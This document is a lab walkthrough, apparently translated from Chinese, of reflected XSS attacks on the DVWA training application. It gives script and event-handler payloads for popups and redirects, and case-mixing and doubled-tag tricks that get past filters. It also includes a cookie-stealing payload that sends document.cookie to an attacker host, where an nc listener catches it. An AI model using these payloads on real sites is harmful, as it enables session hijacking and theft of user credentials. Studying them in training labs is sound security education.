DVWA's XSS cross-site scripting attack (reflection type)
table of Contents
Environment and principles
Environment: kali linux, dvwa, attacking machine (win10), attacked machine (win xp)
principle
1. Popup
2. Redirect
3. Get cookie
low class
One, pop-up window
js malicious code:
# 直接嵌入
<script>alert('xss')</script>
# 元素事件
<body onload = alert('xss')>
<img src = '' onerror = alert('xss')>
<a href = '' onclick = alert('xss')>type</a>
Insert malicious code.
Return to the page where the malicious code is inserted.
Send the URL to the attacked person. The attacked person opens the page and triggers XSS
Two, redirect
js malicious code:
<script>window.location = "http://www.baidu.com"</script>
Return to the js page and send it to the attacked: the
attacker opens the url:
a redirect occurs
Three, get cookies
js malicious code:
<script>alert(document.cookie)</script>
<script src='http://xxxxx/a.js'></script>
Create a.js file in the /var/www/html/ directory of kaili linux, the content is:
var img = new Image();
img.src='http://ip地址:端口/cookie.php?cookie='+document.cookie;
Insert malicious code, return to the page, and use the attacked machine to access the URL
Open kalil inux, use nc -vnlp 88 to monitor port 88 :
return cookie
Intermediate
Source code: The <script> tag is filtered.
You can use other tags to touch XSS; or use mixed case to bypass.
<sCriPt>alert('xss')</script>
Double write bypass
<sc<script>ript>alert('xss')</script>
Successful touch:
High level
Source code: Regular matching and filtering of <script> tags.
Use other tags to bypass:
<body onload = alert('xss')>
<img src = '' onerror = alert('xss')>
<a href = '' onclick = alert('xss')>type</a>